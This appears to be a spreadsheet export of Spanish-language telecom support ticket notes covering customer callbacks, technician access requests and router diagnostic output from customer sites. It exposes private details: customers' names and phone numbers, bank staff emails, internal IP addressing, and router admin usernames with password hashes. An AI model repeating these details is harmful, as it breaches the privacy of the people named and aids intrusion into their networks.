    <t>SE LLAMA A SUPERVISOR DAVID MONTENEGRO 58263058 A QUIEN SE LE INDICA DEL CASO, COMENTA QUE PARA INGRESO AL CC ES NECESARIO ACCEOS CON LA ADMINISTRACIÓN DEL CC, SE LLAMA A CLIENTE QUE REPORTA 35731989 JOSE ARMANDO QUIEN CONFIRMA QUE ES NECESARIO PERMISOS DE CC, SE AGREGA A LLAMADA A PERSONAL EN PR MADELYN 56307637 QUIEN SOLICITA LA INFORMACIÓN AL CORREO ARMANDO.CHUC@PRIMIUM.SV
VEHICULO
HERRAMIENTA
NOMBRE DEL PERSONAL
SUPERVISOR ASIGNA A TODOS, DEPENDIENDO DE LA DISPONIBILIDAD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t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL PR AL 54828981 CONTESTA LA SEÑORITA GLORIA LOPEZ INDICA QUE ESTA EN EL SITIO || SE TRATA DE LOCALIZAR A GESTOR PERO NO SE OBTIENE RESPUESTA || SE NOTIFICA PARA EL SEGUIMIENTO **
ID 2001666234
**</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE CON DATOS DEL POSIBLE PERSONAL TÉCNICO ASIGNADO || PENDIENTE RESPUETA OCNFIRMANDO ACCESO POR PARTE DE ADMINISTRACION DEL CC
ASUNTO: SOLICITUD DE ACCESOS VISITA TÉCNICA ID: 333600027T || ALTURISA GUATEMALA S.A. || FOOD COURT EL NARANJO MALL</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SEÑORITA GLORIA LOPEZ 54828981 NO CONTESTO IVR ENVIA A BUZON, ID: CALL ID: 2001671283</t>
  </si>
  <si>
    <t>F4580564</t>
  </si>
  <si>
    <t>*/*/*/SE COMUNICA CLIENTE ALVARO RODENA PARA SOLICITAR AVANCES, SE CONFIRMA QUE EL SERVICIO ES UN ENLACE DE DATOS PERO INDICA QUE YA COLOCÓ BIEN SUS REGLAS Y LE ESTA PASANDO INTERNET DESDE SU FORTIGATE Y NO NAVEGA, SE CONTACTA A GESTOR LUIS IXCOT POR SKYPE E INDICA QUE ESTA EN ALMUERZO, SE CONTACTA A CNOC 8126 PERO NADIE RESPONDE SOLO PASA DE EXTENSIÓN A OTRA
2001641075
COLA:
NOMBRE: A: MIGUEL ANGEL RODRIGUEZ CRISTÓBAL
NÚMERO: 5147
DURACIÓN: 0:03:05
ESTADO: CONECTADA
DETALLES: 5147
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KANDY.CORONADO
FECHA Y HORA LOCALES: 27/05/2022 14:45:15
--- SE ESCALA CON LIDER JUAN MANUEL CARDONA 41287321 ID: 2001642174 Y SE LE SOLICITA APOYO DE ALGUN GESTOR, ASIGNA A FRANCISCO QUEZADA, SE DEJA EN CONFERENCIA CLIENTE/GESTOR*/*/*/</t>
  </si>
  <si>
    <t>F4580565</t>
  </si>
  <si>
    <t>SE LLAMA A ANDRES GARCIA 56955952 PERO INDICA QUE EL NO SE ENCUENTRA LABORANDO, SOLICITA SE LLAME A CLAUDIA TORRES 54439280 ID: 2001756925</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GELBER MACARIOS 47697694 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001629605
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANDRES GARCIA AL 56955952 NO RESPONDE, SE INTENTARFA LUEGO **
ID 2001629291
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLAUDIA TORRES 54439280 QUIEN VALIDA QUE EL E1 ESTÁ OPERATIVO EN LLAMADAS ENTRANTES Y SALIENTES, AUTORIZA EL CIERRE DEL CASO. ID:2001757577</t>
  </si>
  <si>
    <t>F4580572</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  25214424 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001639739</t>
  </si>
  <si>
    <t>F4580578</t>
  </si>
  <si>
    <t>SE APOYO AL CLIENTE SR. FRANCISCO ORTIZ, SE DETECTO MANIPULACION DE CONEXIONES, EL ROUTER ESTABA CONECTADO AL ETH6 DEL ETX-1, SE PERMITE LA VLAN EN EL PUERTO Y ENLACE LEVANTO, CLIENTE REALIZARA PRUEBAS SOLICITA LLAMAR EN UNA HORA PARA VALIDAR ENLACE.
BIBOS_TEG_22&gt;CONFIG&gt;PORT# SHOW SUMM
PORT           NUMBER         NAME            ADMIN    OPER      SPEED
-----------------------------------------------------------------------------
ETHERNET       1              ETH-1           UP       UP        100000000
ETHERNET       2              ETH-2           UP       DOWN      100000000
ETHERNET       3              ETH-3           UP       DOWN      100000000
ETHERNET       4              ETH-4           UP       DOWN      100000000
ETHERNET       5              ETH-5           UP       DOWN      100000000
ETHERNET       6              ETH-6           UP       UP        1000000000
ETHERNET       101            MNG-ETH         UP       DOWN      100000000
BIBOS_TEG_22&gt;CONFIG&gt;PORT# EXIT
BIBOS_TEG_22&gt;CONFIG#
BIBOS_TEG_22&gt;CONFIG#
BIBOS_TEG_22&gt;CONFIG# BRIDGE 1
BIBOS_TEG_22&gt;CONFIG&gt;BRIDGE(1)# INFO
    ECHO "VLAN CONFIGURATION"
#   VLAN CONFIGURATION
    VLAN 2131
        NAME "VLAN_2131"
        TAGGED-EGRESS 1,3
    EXIT
    VLAN 3752
        NAME "VLAN 3752"
        TAGGED-EGRESS 1,3
    EXIT
BIBOS_TEG_22&gt;CONFIG&gt;BRIDGE(1)# VLAN 3752
BIBOS_TEG_22&gt;CONFIG&gt;BRIDGE(1)&gt;VLAN(3752)# TAGGED-EGRESS 1..6
BIBOS_TEG_22&gt;CONFIG&gt;BRIDGE(1)&gt;VLAN(3752)# SAVE
BIBOS_TEG_22&gt;CONFIG&gt;BRIDGE(1)&gt;VLAN(3752)#
****RUNNING-CONFIG COPIED TO STARTUP-CONFIG SUCCESSFULLY****
****2557 BYTES COPIED IN 1 SECS (2557 BYTES/SEC)****
&lt;FDCEHNGJN1D1EIM3&gt;PING -C 3000 -S 1400 -M 30 -B -VPN-INSTANCE BIGOS 10.1.64.218
  PING 10.1.64.218: 1400  DATA BYTES, PRESS CTRL_C TO BREAK
    ..................................................................................!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.1.64.218 PING STATISTICS ---
    217 PACKET(S) TRANSMITTED
    135 PACKET(S) RECEIVED
    37.78% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/2/3 MS
BIBOS_TEG_22&gt;CONFIG&gt;BRIDGE(1)&gt;VLAN(3752)#
CSC867_BIGOS_TEG22#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.1.64.217             0   0000.5E00.0105  ARPA   GIGABITETHERNET1.3752
INTERNET  10.1.64.218             -   28C7.CE2D.B785  ARPA   GIGABITETHERNET1.3752
INTERNET  10.1.64.221             0   084F.0AC8.6CB9  ARPA   GIGABITETHERNET1.3752
INTERNET  10.1.64.222             0   084F.0AC8.6B8A  ARPA   GIGABITETHERNET1.3752
INTERNET  10.81.32.206            -   28C7.CE2D.B785  ARPA   GIGABITETHERNET1.2131
INTERNET  192.168.1.1             -   28C7.CE2D.B780  ARPA   VLAN1
INTERNET  192.168.1.2             0   14A7.8BDF.AEC1  ARPA   VLAN1
INTERNET  192.168.1.94            0   28EE.521A.3537  ARPA   VLAN1
INTERNET  192.168.1.95            4   D050.995E.8884  ARPA   VLAN1
INTERNET  192.168.1.201           1   0001.2E6D.C36A  ARPA   VLAN1
CSC867_BIGOS_TEG22#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN
ET0                            ADMIN DOWN     DOWN
FA0                            UP             UP
FA1                            UP             UP
FA2                            UP             UP
FA3                            UP             UP
GI0                            ADMIN DOWN     DOWN
GI1                            UP             UP
GI1.2131                       UP             UP       GESTION
GI1.3752                       UP             UP       /_/927747/_/DT04M_BIGOS-UNAH_TEG22
VL1                            UP             UP       LAN
CSC867_BIGOS_TEG22#PING 8.8.8.8 SO
CSC867_BIGOS_TEG22#PING 8.8.8.8 SOURCE VL
CSC867_BIGOS_TEG22#PING 8.8.8.8 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.1.1
.!!!!
SUCCESS RATE IS 80 PERCENT (4/5), ROUND-TRIP MIN/AVG/MAX = 40/40/40 MS
CSC867_BIGOS_TEG22#PING 8.8.8.8 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.1.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 36/40/44 MS
CSC867_BIGOS_TEG22#PING 8.8.8.8 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.1.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 40/40/40 MS
CSC867_BIGOS_TEG22#!</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO ORTIZ 95653127 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 2001639194</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YELSIN AGUILAR 93269532 IVR INDICA QUE EL NUMERO ESTA INCOMPLETO
-ID 2001638470</t>
  </si>
  <si>
    <t>F4580582</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN MIRANDA 59503421 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001666823</t>
  </si>
  <si>
    <t>F4580592</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 22680600 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO. SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DONOVAN ZULETA 22680600 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001684090</t>
  </si>
  <si>
    <t>F4580609</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A TELMEX, A LA ESPERA DE DESCARTES DE PRIMER NIVEL O CONTACTO DEL PUNTO REMOTO.
ASUNTO: SOLICITUD DE SOPORTE ::: ID LOCAL 944543::: TICKET CNOC IMCRL004769::: LINK DOWN || IMGMD005153</t>
  </si>
  <si>
    <t>F4580612</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SR. CABALLERO AL 75728871 INDICA QUE ESTA EN UNA REUNION QUE SE LE VUELVA A LLAMAR **
ID 2001664014
**</t>
  </si>
  <si>
    <t>F4580614</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
SOLICITUD DE SOPORTE TECNICO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KATHERINE AVILES 32923458 MENCIONA QUE PERSISTE EL INCONVENIENTE
-ID 3001039489 - 3001039707
NOMBRE DEL CLIENTE: INVERSIONES GRUPO SINERGIA
UBICACIÓN:EDIFICIO ESCALA COLONIA AMERICA LOCAL 310 PISO #3 ARRIBA DE VIVO
CONTACTO EN SITIO: KATHERINE AVILES 32923458
HORARIO DE ATENCION:8:00 - 16:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SRITA. KATHERINE AVILES AL 32923458  NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001023843
**</t>
  </si>
  <si>
    <t>**SE LLAMA A LA SRITA. KATHERINE AVILES AL 32923458 SOLICITO QUE SE LE LLAMARA NUEVAMENTE YA QUE NO ESTA EN EL LUGAR**
ID 3001009101
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KATHERINE AVILES 32923458 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001026975</t>
  </si>
  <si>
    <t>F4580622</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 24139090 EXT 82410 PARA SEGUIMIENTO, NO CONTESTA; SE LLAMÓ/HABLÓ CON MARLON NAVAS/CENTRAL 30727797 SE INDICA QUE NO HEMOS LOGRADO COMUNICACIÓN CON PR. ME APOYA COLOCANDO EN TRIPARTITA A KATHERINEZ PAZ PR; SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA WAGNER POLANCO/GESTOR N1; EN TRIPARTITA ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>*** SE ENVÍA CORREO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MARTES, 31 DE MAYO DE 2022 7:20
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KATHERINE FABIOLA PAZ ALONSO &lt;KATHERINE.PAZ@BANCOPROMERICA.COM.GT&gt;; WALTER MOISES AROCHE CIFUENTES &lt;WALTER.AROCHE@BANCOPROMERICA.COM.GT&gt;; DIEGO PABLO AJIN HERNANDEZ &lt;DIEGO.AJIN@CLARO.COM.GT&gt;; MARLON ALEXIS NAVAS SAZO &lt;MARLON.NAVAS@BANCOPROMERICA.COM.GT&gt;
CC: SOPORTE OPERACIONES IT &lt;SOPORTEOPERACIONESIT@BANCOPROMERICA.COM.GT&gt;; TELECOMUNICACIONES &lt;TELECOMUNICACIONES@BANCOPROMERICA.COM.GT&gt;; CENTRAL MONITOREO &lt;CENTRAL.MONITOREO@BANCOPROMERICA.COM.GT&gt;; ANGELA ROSARIO GUILLEN AGUILAR &lt;ANGELA.GUILLEN@BANCOPROMERICA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO || 64600034T || BANCO PROMERICA S.A. || LOTE 9 SECTOR III, GRANJAS ITALIA ZONA 4 VILLA NUEVA GUATEMALA
ESTIMADOS BUEN DÍA,
COMENTO QUE PERSONAL TÉCNICO SE HA ECHO PRESENTE A LAS INSTALACIONES Y NO SE LE HA PERMITIDO EL INGRESO. FAVOR DE SU APOYO EN GESTIONAR Y AUTORIZAR LOS ACCESOS PARA EL PERSONAL DESCRITO ANTERIORMENTE.
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER AROCHE AL 24139400 EXT 87270 INDICA QUE PERSONAL TECNICO YA INGRESO A LA AGENCIA **
ID 3001256042
**</t>
  </si>
  <si>
    <t>F4580626</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
JUAN PABLO MORALES BARRONDO
VIE 27/05/2022 2:39 P.M.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PODRÍAN CONFIRMARNOS SI SE TIENE ALGÚN INCONVENIENTE CON LA ENERGÍA O BIEN BRINDARNOS LOS CONTACTOS DEL PUNTO REMOTO PARA REALIZAR PRUEBAS.
TICKET: F4580626
ID: 313900337T¿
IDENTIFICADOR DEL CC_GMG_GT_INTERNET_CALLE_MARTI
INTERNET_CALLE MARTÍ 14-47, ZONA 6,PARROQUIA¿ ¿
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4580638</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE KATHERIN TORRES 73193203
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE KATHERIN QUIEN INDICA QUE LE VA A INFORMAR DE QUE SE NECESITA UN RESET A LA PBX AL ENCARGADO.
SOLICITA QUE SE LE LLAME EN 20MIN.
2001636738
COLA:
NOMBRE: A: 0050321338600
NÚMERO: 0050321338600
DURACIÓN: 0:00:23
ESTADO: CONECTADA
DETALLES: 0050321338600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/05/2022 14:27:47</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE KATHERIN TORRES PARA SABER CUAL ES EL INCONVENIENTE.
2001634520
COLA:
NOMBRE: A: 0050321338600
NÚMERO: 0050321338600
DURACIÓN: 0:01:02
ESTADO: CONECTADA
DETALLES: 0050321338600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/05/2022 14:20:40</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE KATHERIN QUIEN INDICA QUE YA REINCIARON LA PBX PERO NO PUEDEN SACAR LLAMADAS.
SOLICITA VISITA TECNICA. INDICA QUE SE RETIRAN A LAS 17:00HRS. Y SU DIRECCION ES: CIUDAD DELGADO KM 10.5 CONTIGUO A REMAR.
SE APERTURA WO PARA PROGRAMAR VISITA TECNICA PARA EL DIA DE MAÑANA A LAS 8:00AM
CERTIFICACION.
2001644841
COLA:
NOMBRE: A: 0050321338600
NÚMERO: 0050321338600
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 0050321338600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/05/2022 14:54:42</t>
  </si>
  <si>
    <t>F4580662</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CRONO ANTERIOR INDICA ENLACE EN MONITOREO PARA LAS 17:00 HORAS DE HOY A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>F4580685</t>
  </si>
  <si>
    <t>CLIENTE MARIELA SALAZAR 41545639 VALIDA EL FUNCIONAMIENTO DEL E1, AUTORIZA EL CIERRE DEL CASO. ID:2001974434</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARIELA SALAZAR AL 41545639  NO RESPONDE, ENVIA A BUZON || SE INTENTARA
 LUEGO **
ID 2001967778
**</t>
  </si>
  <si>
    <t>F4580698</t>
  </si>
  <si>
    <t>SE LLAMA A JOSUE HERRERA 50670136426 MENCIONA QUE EN EL DIA PRESENTA BASTANTES PERDIDAS Y EN LAS NOCHES YA BAJA UN POCO, SOLICITA SE PUEDA VALIDAR SI NO HAY NINGUN PROBLEMA EN EL NODO
SOLICITA SE PUEDA VALIDAR TAMBIEN EL MERAKI
-ID 2001660850</t>
  </si>
  <si>
    <t>F4580713</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 77401515 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; TIEMPO DE MONITOREO HA FINALIZADO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE.</t>
  </si>
  <si>
    <t>F4580720</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER MIJANGOS 41590697 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001178422 - 3001179365</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VIVIAN VILLAGRAN 47531820 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO KARLA - 44535349
CLIENTE SOLICITA SE PUEDA LLAMAR A PARTIR DE LAS 9:00 HRS
-ID 3001259479</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KARLA - 44535349 MENCIONA QUE NO LE HA PRESENTADO NINGUN PROBLEMA
CLIENTE CONFIRMA EL FUNCIONAMIENTO
-ID 3001275505</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JENIFER TREJO 52842469 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001155574</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VIVIAN VILLAGRAN 47531820 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001154570</t>
  </si>
  <si>
    <t>F4580727</t>
  </si>
  <si>
    <t>SE HA LLAMADO A CLIENTE ERICK MIJANGOS-58650408 ##3 VECES ##ENVIA ABUZON ## ES NECESARIO CORROBORAR DIRECCION + HORARIO DE ATENCION PARA PEDIR AUTORIZACION EN CENTRAL ##SE INENTARA LUEGO</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE PARA TOMAR DATOS ##
ERICK MIJANGOS-58650408 ##VIVO</t>
  </si>
  <si>
    <t>SE ENVIO CORREO AL CLIENTE SOLICITANDO LOS PERMISOS DE ACCESO PARA EL DIA DE MAÑANA A LAS 9:00AM
BUENAS TARDES,
ESTIMADOS POR ESTE MEDIO SE SOLICITA SU APOYO CON EL INGRESO AL TECNICO PARA REVISION DEL SERVICIO TELEFONICO.
BANCO INDUSTRIAL.- KM.21.2 ANTIGUA CARR A AMATITLAN PARQUE NACIONES UNIDAS Z.10 VILLA NUEVA
GDN 66715150.
ADJUNTO ARCHIVO CON LOS DATOS DEL TECNICO.
QUEDO A LA ESPERA DE SU RESPUESTA.</t>
  </si>
  <si>
    <t>F4580755</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILVER MAGAÑA 30060665 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001672919</t>
  </si>
  <si>
    <t>F4580834</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE CENTRAL 58861282 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4580874</t>
  </si>
  <si>
    <t>SE LE NOTIFICA AL CLIENTE MARVIN RIVERA Y SE PROCEDE AL CIERRE DEL CASO. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MARVIN RIVERA, QUIEN INDICA QUE EL ASMI NO SINCRONIZA, SE APLICO RESET PERO NO HAY CAMBIOS.
2001690131
COLA:
NOMBRE: A: 0050376040394
NÚMERO: 0050376040394
DURACIÓN: 0:00:46
ESTADO: CONECTADA
DETALLES: 0050376040394
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/05/2022 17:37:06</t>
  </si>
  <si>
    <t>F4580879</t>
  </si>
  <si>
    <t>SE RETOMA SE VALIDA QUE SE ENCUENTRA OPERATIVO SI EVENTOS RECIENTES SE PROCEDE A VALIDAR VIA VIVO 87422901 LESLIA PEREZ Y NO SE TIENE RESPUESTA POR PARTE. SE QUEDA EN ETAPA PENDIENTE CLIENTE</t>
  </si>
  <si>
    <t xml:space="preserve">SE RETOMA TICKET SE VALIDO EL SERVICIO Y SE ENCUENTRA OPERATIVO POR PARTE DE CLARO NO SE TIENE INCONVENIENTE EL UNICO PROBLEMA QUE SE VALIDA QUE SE TUVO EN ALARMAS ES UN ARRANQUE EN FRIO ESO SIGNIFICA QUE TUVO UN PROBLEMA DE ENERGIA COMERCIAL HACE 7:00 HORAS
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA ROUTER ACTIVO HACE: 7 HORAS Y 12 MINUTOS.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR610 V300R019C10SPC200)
COPYRIGHT (C) 2011-2020 HUAWEI TECH CO., LTD
HUAWEI AR611W ROUTER UPTIME IS 0 WEEK, 0 DAY, 7 HOURS, 13 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 7 HOURS, 12 MINUTES
SDRAM MEMORY SIZE    : 1024    M BYTES
FLASH 0 MEMORY SIZE  : 1024    M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR-SRU617 VER.B
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR611W
4. BOOTROM  VERSION  : 1
&lt;FUNDENUSEWASLALA&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V300R019C10SPC200]
#
 SYSNAME FUNDENUSEWASLALA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
SSL POLICY DEFAULT_POLICY TYPE SERVER
 PKI-REALM DEFAULT
 VERSION TLS1.2
 CIPHERSUITE RSA_AES_128_CBC_SHA RSA_AES_128_SHA256 RSA_AES_256_SHA256 ECDHE_RSA_AES128_GCM_SHA256 ECDHE_RSA_AES256_GCM_SHA384
#
ACL NUMBER 2000
 RULE 5 PERMIT SOURCE 172.16.21.0 0.0.0.255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UNDO PASSWORD ALERT ORIGINAL
 DOMAIN DEFAULT
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
 DOMAIN DEFAULT_ADMIN
  AUTHENTICATION-SCHEME DEFAULT
  ACCOUNTING-SCHEME DEFAULT
 LOCAL-USER ADMIN PASSWORD IRREVERSIBLE-CIPHER $1A$U3_"5ZW1;T$*Z*HF0DMBG0MZ@'~|VKFOSPYY!66]7/5B=-E`;TN$
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TELNET TERMINAL SSH FTP X25-PAD HTTP
 LOCAL-USER SOPORTEDX PASSWORD IRREVERSIBLE-CIPHER $1A$AB2MS&lt;-O$,$)*BF&lt;B@KWEQFU&gt;:^%J$&gt;'OMEVJOHLB6LHBT*MXI,$
 LOCAL-USER SOPORTEDX PRIVILEGE LEVEL 15
 LOCAL-USER SOPORTEDX SERVICE-TYPE TELNET TERMINAL SSH FTP X25-PAD HTTP
#
WEB
 SET FAST-CONFIGURATION STATE DISABLE
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION LAN_CLIENTE
 IP ADDRESS 172.16.21.253 255.255.255.0
#
INTERFACE GIGABITETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/1
#
INTERFACE GIGABITETHERNET0/0/2
#
INTERFACE GIGABITETHERNET0/0/3
#
INTERFACE GIGABITETHERNET0/0/4
 TCP ADJUST-MSS 1200
 IP ADDRESS 10.40.52.226 255.255.255.252
 QOS CAR INBOUND CIR 7168 CBS 1344000 PBS 2688000 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND CIR 7168 CBS 1344000 PBS 2688000 GREEN PASS YELLOW PASS RED DISCARD
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE NULL0
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB03185644788531
 SNMP-AGENT TRAP ENABLE
#
 TELNET SERVER ENABLE
#
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE GIGABITETHERNET0/0/0 WLAN-RADIO0/0/0
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 10.40.52.225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OPS
#
AUTOSTART
#
SECELOG
#
 MS-CHANNEL
#
RETURN
&lt;FUNDENUSEWASLALA&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 14
MAY 28 2022 17:20:18+00:00 FUNDENUSEWASLALA %%01MSTP/4/SET_PORT_FORWARDING(L)[0]:IN MSTP PROCESS 0 INSTANCE 0, MSTP SET PORT GIGABITETHERNET0/0/0 STATE AS FORWARDING.
MAY 28 2022 17:20:16+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[1]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
MAY 28 2022 17:20:15+00:00 FUNDENUSEWASLALA %%01DEV/4/ENTUP(L)[2]:AR611W BOARD[0] REGISTER SUCCESS.
MAY 28 2022 17:20:15+00:00 FUNDENUSEWASLALA %%01RM/4/IPV4_DEFT_RT_CHG(L)[3]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=STATIC, EXITIF=GIGABITETHERNET0/0/4, NEXTHOP=10.40.52.225, NEIGHBOUR=0.0.0.0, PREFERENCE=60, LABEL=NULL, METRIC=0)
MAY 28 2022 17:20:14+00:00 FUNDENUSEWASLALA %%01IFNET/4/LINK_STATE(L)[4]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
MAY 28 2022 17:20:14+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[5]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
MAY 28 2022 17:20:14+00:00 FUNDENUSEWASLALA %%01IFPDT/4/IF_STATE(L)[6]:INTERFACE GIGABITETHERNET0/0/5 HAS TURNED INTO UP STATE.
